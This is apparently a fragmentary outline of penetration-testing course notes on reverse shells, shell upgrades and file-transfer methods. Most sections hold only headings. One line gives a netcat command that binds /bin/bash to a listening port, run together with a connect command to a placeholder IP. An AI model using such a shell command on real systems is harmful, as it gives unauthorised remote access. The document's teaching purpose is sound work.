Module 16 (File Transfers)
Generating reverse shell commands
nc -nvlp 4444 -e /bin/bashnc -nv 192.168.x.x 4444
Upgrading the shell
*Linux to Windows
*Windows to Linux
Method 1: Python pty module
Method 2: Using socat
FTP configurations.
FTPd file commands
VBScript to download files
Power shell commands to download files
Save this php code into /var/www/html/
This is how to use it
Different methods to setup the server for file transfer

wget

curl

To setup a server using PHP, we can use the following command:

To setup a server using python2, we can use the following command:

To setup a server using python3, we can use the following command:

File transfer using Netcat



PSCP (Windows to linux)

Last updated